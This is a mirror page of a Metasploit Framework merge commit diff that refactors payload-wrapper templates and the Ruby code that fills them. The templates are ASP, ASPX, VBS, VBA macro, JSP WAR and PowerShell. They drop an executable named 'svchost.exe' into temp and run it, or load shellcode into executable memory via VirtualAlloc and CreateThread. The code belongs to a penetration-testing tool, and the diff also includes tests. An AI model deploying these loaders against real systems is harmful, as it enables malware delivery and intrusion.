infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'exe-template-refactor' of https://github.com/shellster/metasploit-framework into exe-template-refactor

bug/bundler_fix
root 2013-08-25 09:23:22 -07:00
parent 7121a94684 0a6ac04a0c
commit bb5f71e580
14 changed files with 217 additions and 201 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
data/templates/scripts/to_exe_asp.asp.template → data/templates/scripts/to_exe.asp.template
View File

@ -1,6 +1,7 @@
<%
<%% @language="VBScript" %%>
<%%
Sub %{var_func}()
%{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
%{var_shellcode}
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
Dim %{var_stream}
@ -20,4 +21,4 @@
End Sub
%{var_func}
%>
%%>

12
data/templates/scripts/to_exe_aspx.aspx.template → data/templates/scripts/to_exe.aspx.template
View File

@ -1,10 +1,9 @@
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<%%@ Page Language="C#" AutoEventWireup="true" %%>
<%%@ Import Namespace="System.IO" %%>
<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
StringBuilder %{var_file} = new StringBuilder();
%{var_file}.Append("\x%{exe[0].to_s(16)}%{shellcode}");
%{shellcode}
string %{var_tempdir} = Path.GetTempPath();
string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");
@ -15,10 +14,7 @@
try
{
foreach (char %{var_iterator} in %{var_file}.ToString())
{
fs.WriteByte(Convert.ToByte(%{var_iterator}));
}
fs.Write(%{var_file}, 0, %{var_file}.Length);
}
finally
{

7
data/templates/scripts/to_exe_vba.vb.template → data/templates/scripts/to_exe.vba.template
View File

@ -43,14 +43,14 @@ Sub %{func_name1}()
%{var_index} = 1
While (%{var_index} < Len(%{var_stemp}))
%{var_btemp} = Mid(%{var_stemp},%{var_index},4)
#Put %{var_fhand}, , %{var_btemp}
Put #%{var_fhand}, , %{var_btemp}
%{var_index} = %{var_index} + 4
Wend
ElseIf (InStr(1,%{var_stemp},%{var_magic}) > 0 And Len(%{var_stemp}) > 0) Then
%{var_gotmagic} = True
End If
Next
Close %{var_fhand}
Close #%{var_fhand}
%{func_name2}(%{var_fname})
End Sub
@ -77,4 +77,5 @@ End Sub
'*
'**************************************************************
%{var_magic}%{data}
%{var_magic}
%{data}

2
data/templates/scripts/to_exe_vbs.vb.template → data/templates/scripts/to_exe.vbs.template
View File

@ -1,5 +1,5 @@
Function %{var_func}()
%{var_bytes}=Chr(%{exe[0]})%{var_shellcode}
%{var_shellcode}
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")

6
data/templates/scripts/to_jsp_war.war.template → data/templates/scripts/to_exe_jsp.war.template
View File

@ -1,5 +1,5 @@
<%@ page import="java.io.*" %>
<%
<%%@ page import="java.io.*" %%>
<%%
String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
String %{var_data} = "";
@ -46,4 +46,4 @@
{
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
}
%>
%%>

2
data/templates/scripts/to_vba.vb.template → data/templates/scripts/to_mem.vba.template
View File

@ -15,7 +15,7 @@ Sub Auto_Open()
#Else
Dim %{var_rwxpage} As Long, %{var_res} As Long
#EndIf
%{var_myArray} = Array(%{bytes})
%{bytes}
%{var_rwxpage} = VirtualAlloc(0, UBound(%{var_myArray}), &H1000, &H40)
For %{var_offset} = LBound(%{var_myArray}) To UBound(%{var_myArray})
%{var_myByte} = %{var_myArray}(%{var_offset})

2
data/templates/scripts/to_win32pe_psh_net.ps1.template → data/templates/scripts/to_mem_dotnet.ps1.template
View File

@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
[Byte[]]$%{var_code} = 0x%{code[0].to_s(16)}%{shellcode}
%{shellcode}
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

26
data/templates/scripts/to_mem_old.ps1.template Normal file
View File

@ -0,0 +1,26 @@
$%{var_syscode} = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
%{shellcode}
$%{var_size} = 0x1000
if ($%{var_code}.Length -gt 0x1000) {
$%{var_size} = $%{var_code}.Length
}
$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,0x1000,$%{var_size},0x40)
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1)
}
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

19
data/templates/scripts/to_win32pe_psh.ps1.template
View File

@ -1,19 +0,0 @@
$%{var_code} = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
"@
$%{var_win32_func} = Add-Type -memberDefinition $%{var_code} -Name "Win32" -namespace Win32Functions -passthru
[Byte[]]$%{var_payload} = 0x%{code[0].to_s(16)}%{shellcode}
$%{var_size} = 0x1000
if ($%{var_payload}.Length -gt 0x1000) {$%{var_size} = $%{var_payload}.Length}
$%{var_rwx}=$%{var_win32_func}::VirtualAlloc(0,0x1000,$%{var_size},0x40)
for ($%{var_iter}=0;$%{var_iter} -le ($%{var_payload}.Length-1);$%{var_iter}++) {$%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_payload}[$%{var_iter}], 1)}
$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)

23
lib/msf/base/simple/buffer.rb
View File

@ -16,7 +16,7 @@ module Buffer
#
# Serializes a buffer to a provided format. The formats supported are raw,
# ruby, perl, bash, c, js_be, js_le and java
# ruby, perl, bash, c, js_be, js_le, java and psh
#
def self.transform(buf, fmt = "ruby")
case fmt
@ -39,6 +39,12 @@ module Buffer
buf = Rex::Text.to_unescape(buf, ENDIAN_LITTLE)
when 'java'
buf = Rex::Text.to_java(buf)
when 'powershell', 'ps1'
buf = Rex::Text.to_powershell(buf)
when 'vbscript'
buf = Rex::Text.to_vbscript(buf)
when 'vbapplication'
buf = Rex::Text.to_vbapplication(buf)
else
raise ArgumentError, "Unsupported buffer format: #{fmt}", caller
end
@ -78,7 +84,20 @@ module Buffer
# Returns the list of supported formats
#
def self.transform_formats
['raw','ruby','rb','perl','pl','bash','sh','c','csharp','js_be','js_le','java','python','py']
['raw',
'ruby','rb',
'perl','pl',
'bash','sh',
'c',
'csharp',
'js_be',
'js_le',
'java',
'python','py',
'powershell','ps1',
'vbscript',
'vbapplication'
]
end
end

204
lib/msf/util/exe.rb
View File

@ -55,6 +55,16 @@ require 'digest/sha1'
end
end
def self.read_replace_script_template(filename, hash_sub)
template_pathname = File.join(Msf::Config.install_root, "data", "templates", "scripts", filename)
template = ''
File.open(template_pathname, "rb") do |f|
template = f.read
end
return template % hash_sub
end
##
#
@ -838,13 +848,6 @@ require 'digest/sha1'
# Function 2 executes the binary
hash_sub[:func_name2] = var_base + (var_base_idx+=1).to_s
# The wrapper makes it easier to integrate it into other macros
template_pathname = Metasploit::Framework.root.join("data", "templates", "scripts", "to_exe_vba.vb.template")
template_pathname.open("rb") do |f|
template = f.read
end
hash_sub[:data] = ""
# Writing the bytes of the exe to the file
@ -859,10 +862,10 @@ require 'digest/sha1'
end
end
return template % hash_sub
return read_replace_script_template("to_exe.vba.template", hash_sub)
end
def self.to_vba(framework,code,opts={})
def self.to_vba(framework,code,opts={})
hash_sub = {}
hash_sub[:var_myByte] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
hash_sub[:var_myArray] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
@ -884,34 +887,15 @@ require 'digest/sha1'
hash_sub[:var_Length] = Rex::Text.rand_text_alpha(rand(7)+3).capitalize
# put the shellcode bytes into an array
hash_sub[:bytes] = ''
maxbytes = 20
codebytes = code.unpack('C*')
1.upto(codebytes.length) do |idx|
hash_sub[:bytes] << codebytes[idx].to_s
hash_sub[:bytes] << "," if idx < codebytes.length - 1
hash_sub[:bytes] << " _\r\n" if (idx > 1 and (idx % maxbytes) == 0)
end
template_pathname = Metasploit::Framework.root.join("data", "templates", "scripts", "to_vba.vb.template")
template_pathname.open("rb") do |f|
template = f.read
end
hash_sub[:bytes] = Rex::Text.to_vbapplication(code, hash_sub[:var_myArray])
return template % hash_sub
end
def self.to_win32pe_vba(framework, code, opts={})
to_exe_vba(to_win32pe(framework, code, opts))
return read_replace_script_template("to_mem.vba.template", hash_sub)
end
def self.to_exe_vbs(exes = '', opts={})
delay = opts[:delay] || 5
persist = opts[:persist] || false
exe = exes.unpack('C*')
hash_sub = {}
hash_sub[:var_shellcode] = ""
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
@ -924,42 +908,24 @@ require 'digest/sha1'
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
lines = []
1.upto(exe.length-1) do |byte|
if(byte % 100 == 0)
lines.push "\r\n#{hash_sub[:var_bytes]}=#{hash_sub[:var_bytes]}"
end
# exe is an Array of bytes, not a String, thanks to the unpack
# above, so the following line is not subject to the different
# treatments of String#[] between ruby 1.8 and 1.9
lines.push "&Chr(#{exe[byte]})"
end
hash_sub[:var_shellcode] = lines.join("")
hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes])
hash_sub[:init] = ""
if(persist)
hash_sub[:init] << "Do\r\n"
hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n"
hash_sub[:init] << "WScript.Sleep #{delay * 1000}\r\n"
hash_sub[:init] << "Loop\r\n"
else
hash_sub[:init] << "#{hash_sub[:var_func]}\r\n"
end
template_pathname = Metasploit::Framework.root.join("data", "templates", "scripts", "to_exe_vbs.vb.template")
template_pathname.open("rb") do |f|
template = f.read
end
return template % hash_sub
return read_replace_script_template("to_exe.vbs.template", hash_sub)
end
def self.to_exe_asp(exes = '', opts={})
exe = exes.unpack('C*')
hash_sub = {}
hash_sub[:var_bytes] = Rex::Text.rand_text_alpha(rand(4)+4) # repeated a large number of times, so keep this one small
hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
@ -969,33 +935,14 @@ require 'digest/sha1'
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
lines = []
1.upto(exe.length-1) do |byte|
if(byte % 100 == 0)
lines.push "\r\n%{var_bytes}=%{var_bytes}"
end
# exe is an Array of bytes, not a String, thanks to the unpack
# above, so the following line is not subject to the different
# treatments of String#[] between ruby 1.8 and 1.9
lines.push "&Chr(%{exe[byte]})"
end
hash_sub[:var_shellcode] = lines.join("")
template_pathname = Metasploit::Framework.root.join("data", "templates", "scripts", "to_exe_asp.asp.template")
template_pathname.open("rb") do |f|
template = f.read
end
return template % hash_sub
hash_sub[:var_shellcode] = Rex::Text.to_vbscript(exes, hash_sub[:var_bytes])
return read_replace_script_template("to_exe.asp.template", hash_sub)
end
def self.to_exe_aspx(exes = '', opts={})
exe = exes.unpack('C*')
hash_sub = {}
hash_sub[:var_file] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
@ -1004,26 +951,13 @@ require 'digest/sha1'
hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:shellcode] = ""
hash_sub[:shellcode] = Rex::Text.to_csharp(exes,100,hash_sub[:var_file])
1.upto(exe.length-1) do |byte|
# Apparently .net 1.0 has a limit of 2046 chars per line
if(byte % 100 == 0)
hash_sub[:shellcode] << "\");\r\n\t\t#{hash_sub[:var_file]}.Append(\""
end
hash_sub[:shellcode] << "\\x#{exe[byte].to_s(16)}"
end
template_pathname = Metasploit::Framework.root.join("data", "templates", "scripts", "to_exe_aspx.aspx.template")
template_pathname.open("rb") do |f|
template = f.read
end
return template % hash_sub
return read_replace_script_template("to_exe.aspx.template", hash_sub)
end
def self.to_win32pe_psh_net(framework, code, opts={})
hash_sub = {}
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_kernel32] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_baseaddr] = Rex::Text.rand_text_alpha(rand(8)+8)
@ -1034,72 +968,30 @@ require 'digest/sha1'
hash_sub[:var_compileParams] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
code = code.unpack('C*')
lines = []
1.upto(code.length-1) do |byte|
if(byte % 10 == 0)
lines.push "\r\n$#{hash_sub[:var_code]} += 0x#{code[byte].to_s(16)}"
else
lines.push ",0x#{code[byte].to_s(16)}"
end
end
hash_sub[:shellcode] = lines.join("") + "\r\n\r\n"
hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
template_pathname = Metasploit::Framework.root.join("data", "templates", "scripts", "to_win32pe_psh_net.ps1.template")
template_pathname.open("rb") do |f|
template = f.read
end
return template % hash_sub
return read_replace_script_template("to_mem_dotnet.ps1.template", hash_sub)
end
def self.to_win32pe_psh(framework, code, opts={})
hash_sub = {}
hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_size] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8)
code = code.unpack("C*")
hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
# Add wrapper script
lines = []
1.upto(code.length-1) do |byte|
if(byte % 10 == 0)
lines.push "\r\n$#{hash_sub[:var_payload]} += 0x#{code[byte].to_s(16)}"
else
lines.push ",0x#{code[byte].to_s(16)}"
end
end
hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
hash_sub[:shellcode] = lines.join("") + "\r\n\r\n"
template_pathname = Metasploit::Framework.root.join("data", "templates", "scripts", "to_win32pe_psh_net.ps1.template")
template_pathname.open("rb") do |f|
template = f.read
end
return template % hash_sub
return read_replace_script_template("to_mem_old.ps1.template", hash_sub)
end
def self.to_win32pe_vbs(framework, code, opts={})
to_exe_vbs(to_win32pe(framework, code, opts), opts)
end
def self.to_win32pe_asp(framework, code, opts={})
to_exe_asp(to_win32pe(framework, code, opts), opts)
end
def self.to_win32pe_aspx(framework, code, opts={})
to_exe_aspx(to_win32pe(framework, code, opts), opts)
end
# Creates a jar file that drops the provided +exe+ into a random file name
# in the system's temp dir and executes it.
#
@ -1169,7 +1061,7 @@ require 'digest/sha1'
web_xml.gsub!(/PAYLOAD/, jsp_name)
zip = Rex::Zip::Archive.new
zip.add_file('META-INF/', nil, meta_inf)
zip.add_file('META-INF/', '', meta_inf)
zip.add_file('META-INF/MANIFEST.MF', manifest)
zip.add_file('WEB-INF/', '')
zip.add_file('WEB-INF/web.xml', web_xml)
@ -1198,6 +1090,7 @@ require 'digest/sha1'
def self.to_jsp_war(exe, opts={})
# begin <payload>.jsp
hash_sub = {}
hash_sub[:var_hexpath] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepath] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_data] = Rex::Text.rand_text_alpha(rand(8)+8)
@ -1222,18 +1115,13 @@ require 'digest/sha1'
{
:extra_files =>
[
[ "#{var_hexfile}.txt", payload_hex ]
[ "#{hash_sub[:var_hexfile]}.txt", payload_hex ]
]
})
template_pathname = Metasploit::Framework.root.join("data", "templates", "scripts", "to_jsp_war.war.template")
template_pathname.open("rb") do |f|
template = f.read
end
return self.to_war(template % hash_sub, opts)
template = read_replace_script_template("to_exe_jsp.war.template", hash_sub)
return self.to_war(template, opts)
end
# Creates a .NET DLL which loads data into memory
@ -1774,10 +1662,12 @@ require 'digest/sha1'
case fmt
when 'asp'
output = Msf::Util::EXE.to_win32pe_asp(framework, code, exeopts)
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
output = Msf::Util::EXE.to_exe_asp(exe, exeopts)
when 'aspx'
output = Msf::Util::EXE.to_win32pe_aspx(framework, code, exeopts)
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
output = Msf::Util::EXE.to_exe_aspx(exe, exeopts)
when 'dll'
output = case arch
@ -1837,14 +1727,16 @@ require 'digest/sha1'
output = Msf::Util::EXE.to_vba(framework, code, exeopts)
when 'vba-exe'
exe = Msf::Util::EXE.to_win32pe(framework, code, exeopts)
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
output = Msf::Util::EXE.to_exe_vba(exe)
when 'vbs'
output = Msf::Util::EXE.to_win32pe_vbs(framework, code, exeopts.merge({ :persist => false }))
exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => false }))
when 'loop-vbs'
output = Msf::Util::EXE.to_win32pe_vbs(framework, code, exeopts.merge({ :persist => true }))
exe = exe = to_executable_fmt(framework, arch, plat, code, 'exe', exeopts)
output = Msf::Util::EXE.to_exe_vbs(exe, exeopts.merge({ :persist => true }))
when 'war'
arch ||= [ ARCH_X86 ]

61
lib/rex/text.rb
View File

@ -198,6 +198,67 @@ module Text
return buff
end
#
# Converts a raw string to a powershell byte array
#
def self.to_powershell(str, name = "buf")
return "[Byte[]]$#{name} = ''" if str.nil? or str.empty?
code = str.unpack('C*')
buff = "[Byte[]]$#{name} = 0x#{code[0].to_s(16)}"
1.upto(code.length-1) do |byte|
if(byte % 10 == 0)
buff << "\r\n$#{name} += 0x#{code[byte].to_s(16)}"
else
buff << ",0x#{code[byte].to_s(16)}"
end
end
return buff
end
#
# Converts a raw string to a vbscript byte array
#
def self.to_vbscript(str, name = "buf")
return "#{name}" if str.nil? or str.empty?
code = str.unpack('C*')
buff = "#{name}=Chr(#{code[0]})"
1.upto(code.length-1) do |byte|
if(byte % 100 == 0)
buff << "\r\n#{name}=#{name}"
end
# exe is an Array of bytes, not a String, thanks to the unpack
# above, so the following line is not subject to the different
# treatments of String#[] between ruby 1.8 and 1.9
buff << "&Chr(#{code[byte]})"
end
return buff
end
#
# Converts a raw string into a vba buffer
#
def self.to_vbapplication(str, name = "buf")
return "#{name} = Array()" if str.nil? or str.empty?
code = str.unpack('C*')
buff = "#{name} = Array("
maxbytes = 20
1.upto(code.length) do |idx|
buff << code[idx].to_s
buff << "," if idx < code.length - 1
buff << " _\r\n" if (idx > 1 and (idx % maxbytes) == 0)
end
buff << ")\r\n"
return buff
end
#
# Creates a perl-style comment
#

9
lib/rex/zip/archive.rb
View File

@ -21,6 +21,10 @@ class Archive
#
# Create a new Entry and add it to the archive.
#
# If fdata is set, the file is populated with that data
# from the calling method. If fdata is nil, then the
# fs is checked for the file.
#
def add_file(fname, fdata=nil, xtra=nil, comment=nil)
if (not fdata)
begin
@ -32,7 +36,10 @@ class Archive
ts = st.mtime
if (st.directory?)
attrs = EFA_ISDIR
fname += '/'
fdata = ''
unless fname[-1,1] == '/'
fname += '/'
end
else
f = File.open(fname, 'rb')
fdata = f.read(f.stat.size)

38
spec/support/shared/contexts/msf/util/exe.rb
View File

@ -15,6 +15,24 @@ shared_context 'Msf::Util::Exe' do
{ :format => "exe-only", :arch => "x86", :file_fp => /PE32 / },
{ :format => "exe-only", :arch => "x64", :file_fp => /PE32\+ / },
{ :format => "exe-only", :arch => "x86_64", :file_fp => /PE32\+ / },
{ :format => "vbs", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "vbs", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "loop-vbs", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "loop-vbs", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "asp", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "asp", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "aspx", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "aspx", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "vba", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "vba", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "vba-exe", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "vba-exe", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "psh", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "psh", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "psh-net", :arch => "x86", :file_fp => /ASCII/ },
{ :format => "psh-net", :arch => "x86_64", :file_fp => /ASCII/ },
{ :format => "war", :arch => "x86", :file_fp => /Zip/ },
{ :format => "war", :arch => "x86_64", :file_fp => /Zip/ },
],
"linux" => [
{ :format => "elf", :arch => "x86", :file_fp => /ELF 32.*SYSV/ },
@ -22,27 +40,41 @@ shared_context 'Msf::Util::Exe' do
{ :format => "elf", :arch => "armle", :file_fp => /ELF 32.*ARM/ },
{ :format => "elf", :arch => "mipsbe", :file_fp => /ELF 32-bit MSB executable, MIPS/ },
{ :format => "elf", :arch => "mipsle", :file_fp => /ELF 32-bit LSB executable, MIPS/ },
{ :format => "war", :arch => "x86", :file_fp => /Zip/ },
{ :format => "war", :arch => "x64", :file_fp => /Zip/ },
{ :format => "war", :arch => "armle", :file_fp => /Zip/ },
{ :format => "war", :arch => "mipsbe", :file_fp => /Zip/ },
{ :format => "war", :arch => "mipsle", :file_fp => /Zip/ },
],
"bsd" => [
{ :format => "elf", :arch => "x86", :file_fp => /ELF 32.*BSD/ },
{ :format => "war", :arch => "x86", :file_fp => /Zip/ },
],
"solaris" => [
{ :format => "elf", :arch => "x86", :file_fp => /ELF 32/ },
{ :format => "war", :arch => "x86", :file_fp => /Zip/ },
],
"osx" => [
{ :format => "macho", :arch => "x86", :file_fp => /Mach-O.*i386/ },
{ :format => "macho", :arch => "x64", :file_fp => /Mach-O 64/ },
{ :format => "macho", :arch => "armle", :file_fp => /Mach-O.*(acorn|arm)/ },
{ :format => "macho", :arch => "ppc", :file_fp => /Mach-O.*ppc/ },
{ :format => "war", :arch => "x86", :file_fp => /Zip/ },
{ :format => "war", :arch => "x64", :file_fp => /Zip/ },
{ :format => "war", :arch => "armle", :file_fp => /Zip/ },
{ :format => "war", :arch => "ppc", :file_fp => /Zip/ },
],
}
def verify_bin_fingerprint(format_hash, bin)
bin.should be_a(String)
fp = IO.popen("file -","w+") do |io|
io.write(bin)
io.close_write
io.read
begin
io.write(bin)
rescue
end
io.close_write
io.read
end
if format_hash[:file_fp]
fp.should =~ format_hash[:file_fp]